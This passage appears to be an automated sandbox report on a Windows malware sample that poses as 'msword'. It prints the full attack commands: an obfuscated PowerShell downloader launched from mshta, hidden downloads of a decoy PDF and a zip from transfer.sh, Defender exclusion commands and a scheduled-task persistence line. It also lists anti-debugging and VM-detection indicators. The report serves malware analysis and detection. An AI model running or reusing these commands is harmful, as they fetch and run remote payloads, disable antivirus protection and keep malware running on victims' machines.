Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00E9B980 GetSystemInfo,SetProcessPriorityBoost,17_2_00E9B980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: powershell.exe, 00000001.00000002.1662915027.0000000003659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: powershell.exe, 00000001.00000002.1662915027.00000000035CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000001.00000002.1662915027.00000000035CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000006.00000002.2872035721.0000019D43C56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2868379629.0000019D3E62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: msword.com, 00000011.00000002.2870305669.000002173B3C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EC89A0 Start: 00EC89A9 End: 00EC89BF17_2_00EC89A0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D489A0 Start: 00D489A9 End: 00D489BF30_2_00D489A0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EC89A0 rdtscp17_2_00EC89A0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_0000021760F3D028 mov eax, dword ptr fs:[00000030h]17_2_0000021760F3D028
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_0000017FABC1D028 mov eax, dword ptr fs:[00000030h]30_2_0000017FABC1D028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EB13A0 AddVectoredExceptionHandler,RtlAddVectoredContinueHandler,RtlAddVectoredContinueHandler,SetUnhandledExceptionFilter,17_2_00EB13A0
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D313A0 AddVectoredExceptionHandler,RtlAddVectoredContinueHandler,RtlAddVectoredContinueHandler,SetUnhandledExceptionFilter,30_2_00D313A0
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msword.exe'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msword.exe'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com'
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\W2.pdfJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/WD631pf02G/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.com msword.com Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.com'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msword.exe'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.exe'
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function dosmylz($spupzwqnigoc, $gpwqzkdq){[io.file]::writeallbytes($spupzwqnigoc, $gpwqzkdq)};function jcjwvhfzghefb($spupzwqnigoc){if($spupzwqnigoc.endswith((jzmpkwatkoqyw @(73205,73259,73267,73267))) -eq $true){rundll32.exe $spupzwqnigoc }elseif($spupzwqnigoc.endswith((jzmpkwatkoqyw @(73205,73271,73274,73208))) -eq $true){powershell.exe -executionpolicy unrestricted -file $spupzwqnigoc}elseif($spupzwqnigoc.endswith((jzmpkwatkoqyw @(73205,73268,73274,73264))) -eq $true){misexec /qn /i $spupzwqnigoc}else{start-process $spupzwqnigoc}};function pxgyscuvqpfxtrqrgab($ibxpjapncwy){$otxyshshoclfskhrq = new-object (jzmpkwatkoqyw @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$gpwqzkdq = $otxyshshoclfskhrq.downloaddata($ibxpjapncwy);return $gpwqzkdq};function jzmpkwatkoqyw($ejbdnpqvr){$hwxdorzrbma=73159;$uzizylzxw=$null;foreach($ffcjyituvadhda in $ejbdnpqvr){$uzizylzxw+=[char]($ffcjyituvadhda-$hwxdorzrbma)};return $uzizylzxw};function avklntga(){$ivrwfacecqtymc = $env:appdata + '\';$qjsurcf = $ivrwfacecqtymc + 'c.bat'; if (test-path -path $qjsurcf){jcjwvhfzghefb $qjsurcf;}else{ $ppdhkszgzphk = pxgyscuvqpfxtrqrgab (jzmpkwatkoqyw @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dosmylz $qjsurcf $ppdhkszgzphk;jcjwvhfzghefb $qjsurcf;};;;;}avklntga;
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function dosmylz($spupzwqnigoc, $gpwqzkdq){[io.file]::writeallbytes($spupzwqnigoc, $gpwqzkdq)};function jcjwvhfzghefb($spupzwqnigoc){if($spupzwqnigoc.endswith((jzmpkwatkoqyw @(73205,73259,73267,73267))) -eq $true){rundll32.exe $spupzwqnigoc }elseif($spupzwqnigoc.endswith((jzmpkwatkoqyw @(73205,73271,73274,73208))) -eq $true){powershell.exe -executionpolicy unrestricted -file $spupzwqnigoc}elseif($spupzwqnigoc.endswith((jzmpkwatkoqyw @(73205,73268,73274,73264))) -eq $true){misexec /qn /i $spupzwqnigoc}else{start-process $spupzwqnigoc}};function pxgyscuvqpfxtrqrgab($ibxpjapncwy){$otxyshshoclfskhrq = new-object (jzmpkwatkoqyw @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$gpwqzkdq = $otxyshshoclfskhrq.downloaddata($ibxpjapncwy);return $gpwqzkdq};function jzmpkwatkoqyw($ejbdnpqvr){$hwxdorzrbma=73159;$uzizylzxw=$null;foreach($ffcjyituvadhda in $ejbdnpqvr){$uzizylzxw+=[char]($ffcjyituvadhda-$hwxdorzrbma)};return $uzizylzxw};function avklntga(){$ivrwfacecqtymc = $env:appdata + '\';$qjsurcf = $ivrwfacecqtymc + 'c.bat'; if (test-path -path $qjsurcf){jcjwvhfzghefb $qjsurcf;}else{ $ppdhkszgzphk = pxgyscuvqpfxtrqrgab (jzmpkwatkoqyw @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dosmylz $qjsurcf $ppdhkszgzphk;jcjwvhfzghefb $qjsurcf;};;;;}avklntga;Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
